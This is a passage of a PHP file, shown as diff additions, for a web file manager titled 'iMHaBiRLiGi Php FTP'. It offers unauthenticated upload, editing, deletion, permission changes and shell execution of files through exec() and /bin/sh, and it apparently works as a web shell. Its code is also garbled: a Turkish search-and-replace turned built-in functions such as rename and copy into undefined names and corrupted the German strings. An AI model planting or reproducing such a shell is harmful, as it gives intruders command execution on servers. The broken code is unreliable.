filesize($file)); + + readfile($file); + + break; + +case 'upload': + + $dest = relative2absolute($file['name'], $directory); + + if (@file_exists($dest)) { + listing_page(error('already_exists', $dest)); + } elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) { + listing_page(notice('uploaded', $file['name'])); + } else { + listing_page(error('not_uploaded', $file['name'])); + } + + break; + +case 'create_directory': + + if (@file_exists($file)) { + listing_page(error('already_exists', $file)); + } else { + $old = @umask(0777 & ~$dirpermission); + if (@mkdir($file, $dirpermission)) { + listing_page(notice('created', $file)); + } else { + listing_page(error('not_created', $file)); + } + @umask($old); + } + + break; + +case 'create_file': + + if (@file_exists($file)) { + listing_page(error('already_exists', $file)); + } else { + $old = @umask(0777 & ~$filepermission); + if (@touch($file)) { + Düzenle($file); + } else { + listing_page(error('not_created', $file)); + } + @umask($old); + } + + break; + +case 'execute': + + chdir(dirname($file)); + + $output = array(); + $retval = 0; + exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval); + + $error = ($retval == 0) ? false : true; + + if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . 
'>'); + + if ($error) { + listing_page(error('not_executed', $file, implode("\n", $output))); + } else { + listing_page(notice('executed', $file, implode("\n", $output))); + } + + break; + +case 'Sil': + + if (!empty($_POST['no'])) { + listing_page(); + } elseif (!empty($_POST['yes'])) { + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + if (del($file)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_Sild', implode("\n", $failure)); + } + if (sizeof($success) > 0) { + $message .= notice('Sild', implode("\n", $success)); + } + + listing_page($message); + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\t<b>" . word('really_Sil') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + <input type="submit" name="no" value="' . word('no') . '" id="red_button" /> + <input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" /> +</td> +</tr> +</table> +</form> + +'; + + html_footer(); + + } + + break; + +case 'Degistir': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (!@file_exists($dest) && @Degistir($file, $dest)) { + listing_page(notice('Degistird', $file, $dest)); + } else { + listing_page(error('not_Degistird', $file, $dest)); + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + <input type="hidden" name="action" value="Degistir" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + <b>' . word('Degistir_file') . '</b> + <p>' . html($file) . '</p> + <hr /> + ' . word('Yol') . 
': + <input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" /> + <input type="submit" value="' . word('Degistir') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Tasi': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + $filename = substr($file, strlen($directory)); + $d = $dest . $filename; + if (!@file_exists($d) && @Degistir($file, $d)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_Tasid', implode("\n", $failure), $dest); + } + if (sizeof($success) > 0) { + $message .= notice('Tasid', implode("\n", $success), $dest); + } + + listing_page($message); + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\t<b>" . word('Tasi_files') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + ' . word('Yol') . ': + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('Tasi') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Kopyala': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (@is_dir($dest)) { + + $failure = array(); + $success = array(); + + foreach ($files as $file) { + $filename = substr($file, strlen($directory)); + $d = addslash($dest) . 
$filename; + if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) { + $success[] = $file; + } else { + $failure[] = $file; + } + } + + $message = ''; + if (sizeof($failure) > 0) { + $message = error('not_copied', implode("\n", $failure), $dest); + } + if (sizeof($success) > 0) { + $message .= notice('copied', implode("\n", $success), $dest); + } + + listing_page($message); + + } else { + + if (!@file_exists($dest) && @Kopyala($file, $dest)) { + listing_page(notice('copied', $file, $dest)); + } else { + listing_page(error('not_copied', $file, $dest)); + } + + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> +'; + + request_dump(); + + echo "\n<b>" . word('Kopyala_files') . '</b> + <p> +'; + + foreach ($files as $file) { + echo "\t" . html($file) . "<br />\n"; + } + + echo ' </p> + <hr /> + ' . word('Yol') . ': + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('Kopyala') . '" /> +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'create_symlink': + + if (!empty($_POST['Yol'])) { + + $dest = relative2absolute($_POST['Yol'], $directory); + + if (substr($dest, -1, 1) == $delim) $dest .= basename($file); + + if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file); + + if (!@file_exists($dest) && @symlink($file, $dest)) { + listing_page(notice('symlinked', $file, $dest)); + } else { + listing_page(error('not_symlinked', $file, $dest)); + } + + } else { + + html_header(); + + echo '<form action="' . $self . '" method="post"> + +<table class="dialog" id="symlink"> +<tr> + <td style="vertical-align: top">' . word('Yol') . ': </td> + <td> + <b>' . html($file) . 
'</b><br /> + <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" /> + <label for="checkbox_relative">' . word('relative') . '</label> + <input type="hidden" name="action" value="create_symlink" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + </td> +</tr> +<tr> + <td>' . word('symlink') . ': </td> + <td> + <input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" /> + <input type="submit" value="' . word('create_symlink') . '" /> + </td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +case 'Düzenle': + + if (!empty($_POST['save'])) { + + $content = str_replace("\r\n", "\n", $_POST['content']); + + if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) { + listing_page(notice('saved', $file)); + } else { + listing_page(error('not_saved', $file)); + } + + } else { + + if (@is_readable($file) && @is_writable($file)) { + Düzenle($file); + } else { + listing_page(error('not_Düzenleed', $file)); + } + + } + + break; + +case 'permission': + + if (!empty($_POST['set'])) { + + $mode = 0; + if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100; + if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010; + if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001; + + if (@chmod($file, $mode)) { + listing_page(notice('permission_set', $file, decoct($mode))); + } else { + listing_page(error('permission_not_set', $file, decoct($mode))); + } + + } else { + + html_header(); + + $mode = fileperms($file); + + echo '<form action="' . $self . 
'" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + + <p style="margin: 0">' . phrase('permission_for', $file) . '</p> + + <hr /> + + <table id="permission"> + <tr> + <td></td> + <td style="border-right: 1px solid black">' . word('owner') . '</td> + <td style="border-right: 1px solid black">' . word('group') . '</td> + <td>' . word('other') . '</td> + </tr> + <tr> + <td style="text-align: right">' . word('read') . ':</td> + <td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td> + </tr> + <tr> + <td style="text-align: right">' . word('write') . ':</td> + <td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td> + </tr> + <tr> + <td style="text-align: right">' . word('execute') . ':</td> + <td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td> + </tr> + </table> + + <hr /> + + <input type="submit" name="set" value="' . word('set') . '" /> + + <input type="hidden" name="action" value="permission" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . 
word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +default: + + listing_page(); + +} + +/* ------------------------------------------------------------------------- */ + +function getlist ($directory) { + global $delim, $win; + + if ($d = @opendir($directory)) { + + while (($filename = @readdir($d)) !== false) { + + $path = $directory . $filename; + + if ($stat = @lstat($path)) { + + $file = array( + 'filename' => $filename, + 'path' => $path, + 'is_file' => @is_file($path), + 'is_dir' => @is_dir($path), + 'is_link' => @is_link($path), + 'is_readable' => @is_readable($path), + 'is_writable' => @is_writable($path), + 'size' => $stat['size'], + 'permission' => $stat['mode'], + 'owner' => $stat['uid'], + 'group' => $stat['gid'], + 'mtime' => @filemtime($path), + 'atime' => @fileatime($path), + 'ctime' => @filectime($path) + ); + + if ($file['is_dir']) { + $file['is_executable'] = @file_exists($path . $delim . '.'); + } else { + if (!$win) { + $file['is_executable'] = @is_executable($path); + } else { + $file['is_executable'] = true; + } + } + + if ($file['is_link']) $file['target'] = @readlink($path); + + if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner'])); + if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group'])); + + $files[] = $file; + + } + + } + + return $files; + + } else { + return false; + } + +} + +function sortlist (&$list, $key, $reverse) { + + quicksort($list, 0, sizeof($list) - 1, $key); + + if ($reverse) $list = array_reverse($list); + +} + +function quicksort (&$array, $first, $last, $key) { + + if ($first < $last) { + + $cmp = $array[floor(($first + $last) / 2)][$key]; + + $l = $first; + $r = $last; + + while ($l <= $r) { + + while ($array[$l][$key] < $cmp) $l++; + while ($array[$r][$key] > $cmp) $r--; + + if ($l <= $r) { + + $tmp = $array[$l]; + $array[$l] = $array[$r]; + $array[$r] = $tmp; + + $l++; + $r--; + + } + + } + + 
quicksort($array, $first, $r, $key); + quicksort($array, $l, $last, $key); + + } + +} + +function permission_octal2string ($mode) { + + if (($mode & 0xC000) === 0xC000) { + $type = 's'; + } elseif (($mode & 0xA000) === 0xA000) { + $type = 'l'; + } elseif (($mode & 0x8000) === 0x8000) { + $type = '-'; + } elseif (($mode & 0x6000) === 0x6000) { + $type = 'b'; + } elseif (($mode & 0x4000) === 0x4000) { + $type = 'd'; + } elseif (($mode & 0x2000) === 0x2000) { + $type = 'c'; + } elseif (($mode & 0x1000) === 0x1000) { + $type = 'p'; + } else { + $type = '?'; + } + + $owner = ($mode & 00400) ? 'r' : '-'; + $owner .= ($mode & 00200) ? 'w' : '-'; + if ($mode & 0x800) { + $owner .= ($mode & 00100) ? 's' : 'S'; + } else { + $owner .= ($mode & 00100) ? 'x' : '-'; + } + + $group = ($mode & 00040) ? 'r' : '-'; + $group .= ($mode & 00020) ? 'w' : '-'; + if ($mode & 0x400) { + $group .= ($mode & 00010) ? 's' : 'S'; + } else { + $group .= ($mode & 00010) ? 'x' : '-'; + } + + $other = ($mode & 00004) ? 'r' : '-'; + $other .= ($mode & 00002) ? 'w' : '-'; + if ($mode & 0x200) { + $other .= ($mode & 00001) ? 't' : 'T'; + } else { + $other .= ($mode & 00001) ? 'x' : '-'; + } + + return $type . $owner . $group . 
$other; + +} + +function is_script ($filename) { + return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename); +} + +function getmimetype ($filename) { + static $mimes = array( + '\.jpg$|\.jpeg$' => 'image/jpeg', + '\.gif$' => 'image/gif', + '\.png$' => 'image/png', + '\.html$|\.html$' => 'text/html', + '\.txt$|\.asc$' => 'text/plain', + '\.xml$|\.xsl$' => 'application/xml', + '\.pdf$' => 'application/pdf' + ); + + foreach ($mimes as $regex => $mime) { + if (eregi($regex, $filename)) return $mime; + } + + // return 'application/octet-stream'; + return 'text/plain'; + +} + +function del ($file) { + global $delim; + + if (!@is_link($file) && !file_exists($file)) return false; + + if (!@is_link($file) && @is_dir($file)) { + + if ($dir = @opendir($file)) { + + $error = false; + + while (($f = readdir($dir)) !== false) { + if ($f != '.' && $f != '..' && !del($file . $delim . $f)) { + $error = true; + } + } + closedir($dir); + + if (!$error) return @rmdir($file); + + return !$error; + + } else { + return false; + } + + } else { + return @unlink($file); + } + +} + +function addslash ($directory) { + global $delim; + + if (substr($directory, -1, 1) != $delim) { + return $directory . $delim; + } else { + return $directory; + } + +} + +function relative2absolute ($string, $directory) { + + if (path_is_relative($string)) { + return simplify_path(addslash($directory) . $string); + } else { + return simplify_path($string); + } + +} + +function path_is_relative ($path) { + global $win; + + if ($win) { + return (substr($path, 1, 1) != ':'); + } else { + return (substr($path, 0, 1) != '/'); + } + +} + +function absolute2relative ($directory, $target) { + global $delim; + + $path = ''; + while ($directory != $target) { + if ($directory == substr($target, 0, strlen($directory))) { + $path .= substr($target, strlen($directory)); + break; + } else { + $path .= '..' . 
$delim; + $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1); + } + } + if ($path == '') $path = '.'; + + return $path; + +} + +function simplify_path ($path) { + global $delim; + + if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') { + $path = realpath($path); + if (@is_dir($path)) { + return addslash($path); + } else { + return $path; + } + } + + $pattern = $delim . '.' . $delim; + + if (@is_dir($path)) { + $path = addslash($path); + } + + while (strpos($path, $pattern) !== false) { + $path = str_replace($pattern, $delim, $path); + } + + $e = addslashes($delim); + $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e; + + while (ereg($regex, $path)) { + $path = ereg_replace($regex, $delim, $path); + } + + return $path; + +} + +function human_filesize ($filesize) { + + $suffices = 'kMGTPE'; + + $n = 0; + while ($filesize >= 1000) { + $filesize /= 1024; + $n++; + } + + $filesize = round($filesize, 3 - strpos($filesize, '.')); + + if (strpos($filesize, '.') !== false) { + while (in_array(substr($filesize, -1, 1), array('0', '.'))) { + $filesize = substr($filesize, 0, strlen($filesize) - 1); + } + } + + $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1)); + + return $filesize . " {$suffix}B"; + +} + +function strip (&$str) { + $str = stripslashes($str); +} + +/* ------------------------------------------------------------------------- */ + +function listing_page ($message = null) { + global $self, $directory, $sort, $reverse; + + html_header(); + + $list = getlist($directory); + + if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename'; + if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false; + + sortlist($list, $sort, $reverse); + + echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1> + +<form enctype="multipart/form-data" action="' . $self . 
'" method="post"> + +<table id="main"> +'; + + directory_choice(); + + if (!empty($message)) { + spacer(); + echo $message; + } + + if (@is_writable($directory)) { + upload_box(); + create_box(); + } else { + spacer(); + } + + if ($list) { + listing($list); + } else { + echo error('not_readable', $directory); + } + + echo '</table> + +</form> + +'; + + html_footer(); + +} + +function listing ($list) { + global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self; + + echo '<tr class="listing"> + <th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th> +'; + + $d = 'dir=' . urlencode($directory) . '&amp;'; + + if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n"; + + if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n"; + + if (!$win) { + + if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n"; + + if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n"; + + if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n"; + + } + + echo ' <th class="Gِrevler">' . word('Gِrevler') . '</th> +</tr> +'; + + for ($i = 0; $i < sizeof($list); $i++) { + $file = $list[$i]; + + $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', '; + $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', '; + $timestamps .= 'ctime: ' . 
date($date_format, $file['ctime']); + + echo '<tr class="listing"> + <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td> + <td class="filename" title="' . html($timestamps) . '">'; + + if ($file['is_link']) { + + echo '<img src="' . $self . '?image=link" alt="link" /> '; + echo html($file['filename']) . ' &rarr; '; + + $real_file = relative2absolute($file['target'], $directory); + + if (@is_readable($real_file)) { + if (@is_dir($real_file)) { + echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]'; + } else { + echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>'; + } + } else { + echo html($file['target']); + } + + } elseif ($file['is_dir']) { + + echo '<img src="' . $self . '?image=folder" alt="folder" /> [ '; + if ($win || $file['is_executable']) { + echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; + } else { + echo html($file['filename']); + } + echo ' ]'; + + } else { + + if (substr($file['filename'], 0, 1) == '.') { + echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> '; + } else { + echo '<img src="' . $self . '?image=file" alt="file" /> '; + } + + if ($file['is_file'] && $file['is_readable']) { + echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; + } else { + echo html($file['filename']); + } + + } + + if ($file['size'] >= 1000) { + $human = ' title="' . human_filesize($file['size']) . '"'; + } else { + $human = ''; + } + + echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n"; + + if (!$win) { + + echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">'; + + $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid()); + if ($l) echo '<a href="' . $self . 
'?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">'; + echo html(permission_octal2string($file['permission'])); + if ($l) echo '</a>'; + + echo "</td>\n"; + + if (array_key_exists('owner_name', $file)) { + echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n"; + } else { + echo "\t<td class=\"owner\">{$file['owner']}</td>\n"; + } + + if (array_key_exists('group_name', $file)) { + echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n"; + } else { + echo "\t<td class=\"group\">{$file['group']}</td>\n"; + } + + } + + echo ' <td class="Gِrevler"> + <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" /> +'; + + $actions = array(); + if (function_exists('symlink')) { + $actions[] = 'create_symlink'; + } + if (@is_writable(dirname($file['path']))) { + $actions[] = 'Sil'; + $actions[] = 'Degistir'; + $actions[] = 'Tasi'; + } + if ($file['is_file'] && $file['is_readable']) { + $actions[] = 'Kopyala'; + $actions[] = 'indir'; + if ($file['is_writable']) $actions[] = 'Düzenle'; + } + if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { + $actions[] = 'execute'; + } + + if (sizeof($actions) > 0) { + + echo ' <select class="small" name="action' . $i . '" size="1"> + <option value="">' . str_repeat('&nbsp;', 30) . '</option> +'; + + foreach ($actions as $action) { + echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n"; + } + + echo ' </select> + <input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" /> +'; + + } + + echo ' </td> +</tr> +'; + + } + + echo '<tr class="listing_footer"> + <td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td> + <td colspan="' . ($cols - 1) . '"> + <input type="hidden" name="num" value="' . sizeof($list) . 
'" /> + <input type="hidden" name="focus" value="" /> + <input type="hidden" name="olddir" value="' . html($directory) . '" /> +'; + + $actions = array(); + if (@is_writable(dirname($file['path']))) { + $actions[] = 'Sil'; + $actions[] = 'Tasi'; + } + $actions[] = 'Kopyala'; + + echo ' <select class="small" name="action_all" size="1"> + <option value="">' . str_repeat('&nbsp;', 30) . '</option> +'; + + foreach ($actions as $action) { + echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n"; + } + + echo ' </select> + <input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" /> + </td> +</tr> +'; + +} + +function directory_choice () { + global $directory, $homedir, $cols, $self; + + echo '<tr> + <td colspan="' . $cols . '" id="directory"> + <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>: + <input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" /> + <input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" /> + </td> +</tr> +'; + +} + +function upload_box () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" id="upload"> + ' . word('file') . ': + <input type="file" name="upload" onfocus="activate(\'other\')" /> + <input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" /> + </td> +</tr> +'; + +} + +function create_box () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" id="create"> + <select name="create_type" size="1" onfocus="activate(\'create\')"> + <option value="file">' . word('file') . '</option> + <option value="directory">' . word('directory') . '</option> + </select> + <input type="text" name="create_name" onfocus="activate(\'create\')" /> + <input type="submit" name="submit_create" value="' . word('create') . 
'" onfocus="activate(\'create\')" /> + </td> +</tr> +'; + +} + +function Düzenle ($file) { + global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess; + + html_header(); + + echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2> + +<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + + <textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">'; + + if (array_key_exists('content', $_POST)) { + echo $_POST['content']; + } else { + $f = fopen($file, 'r'); + while (!feof($f)) { + echo html(fread($f, 8192)); + } + fclose($f); + } + + if (!empty($_POST['user'])) { + echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']); + } + if (!empty($_POST['basic_auth'])) { + if ($win) { + $authfile = str_replace('\\', '/', $directory) . $htpasswd; + } else { + $authfile = $directory . $htpasswd; + } + echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n"; + echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n"; + echo 'Require valid-user'; + } + + echo '</textarea> + + <hr /> +'; + + if ($apache && basename($file) == $htpasswd) { + echo ' + ' . word('user') . ': <input type="text" name="user" /> + ' . word('password') . ': <input type="password" name="password" /> + <input type="submit" value="' . word('add') . '" /> + + <hr /> +'; + + } + + if ($apache && basename($file) == $htaccess) { + echo ' + <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" /> + + <hr /> +'; + + } + + echo ' + <input type="hidden" name="action" value="Düzenle" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + <input type="reset" value="' . word('reset') . '" id="red_button" /> + <input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" /> + +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . 
urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + +} + +function spacer () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" style="height: 1em"></td> +</tr> +'; + +} + +function textfieldsize ($content) { + + $size = strlen($content) + 5; + if ($size < 30) $size = 30; + + return $size; + +} + +function request_dump () { + + foreach ($_REQUEST as $key => $value) { + echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n"; + } + +} + +/* ------------------------------------------------------------------------- */ + +function html ($string) { + global $charset; + return htmlentities($string, ENT_COMPAT, $charset); +} + +function word ($word) { + global $words, $word_charset; + return htmlentities($words[$word], ENT_COMPAT, $word_charset); +} + +function phrase ($phrase, $arguments) { + global $words; + static $search; + + if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i"; + + for ($i = 0; $i < sizeof($arguments); $i++) { + $arguments[$i] = nl2br(html($arguments[$i])); + } + + $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>'); + + return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase])))); + +} + +function getwords ($lang) { + global $word_charset, $date_format; + + switch ($lang) { + case 'de': + + $date_format = 'd.m.y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Verzeichnis', +'file' => 'Datei', +'filename' => 'Dateiname', + +'size' => 'Grِكe', +'permission' => 'Rechte', +'owner' => 'Eigner', +'group' => 'Gruppe', +'other' => 'Andere', +'Gِrevler' => 'Funktionen', + +'read' => 'lesen', +'write' => 'schreiben', +'execute' => 'ausführen', + +'create_symlink' => 'Symlink erstellen', +'Sil' => 'lِschen', +'Degistir' => 'umbenennen', +'Tasi' => 'verschieben', +'Kopyala' => 'kopieren', +'Düzenle' => 'Düzenleieren', +'indir' => 
'herunterladen', +'upload' => 'hochladen', +'create' => 'erstellen', +'change' => 'wechseln', +'save' => 'speichern', +'set' => 'setze', +'reset' => 'zurücksetzen', +'relative' => 'Pfad zum Ziel relativ', + +'yes' => 'Ja', +'no' => 'Nein', +'Geri' => 'zurück', +'Yol' => 'Ziel', +'symlink' => 'Symbolischer Link', +'no_output' => 'keine Ausgabe', + +'user' => 'Benutzername', +'password' => 'Kennwort', +'add' => 'hinzufügen', +'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen', + +'uploaded' => '"[%1]" wurde hochgeladen.', +'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', +'already_exists' => '"[%1]" existiert bereits.', +'created' => '"[%1]" wurde erstellt.', +'not_created' => '"[%1]" konnte nicht erstellt werden.', +'really_Sil' => 'Sollen folgende Dateien wirklich gelِscht werden?', +'Sild' => "Folgende Dateien wurden gelِscht:\n[%1]", +'not_Sild' => "Folgende Dateien konnten nicht gelِscht werden:\n[%1]", +'Degistir_file' => 'Benenne Datei um:', +'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.', +'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', +'Tasi_files' => 'Verschieben folgende Dateien:', +'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]", +'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]", +'Kopyala_files' => 'Kopiere folgende Dateien:', +'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", +'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", +'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.', +'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}", +'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}", +'saved' => '"[%1]" wurde gespeichert.', +'not_saved' => '"[%1]" konnte nicht gespeichert werden.', +'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', +'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', 
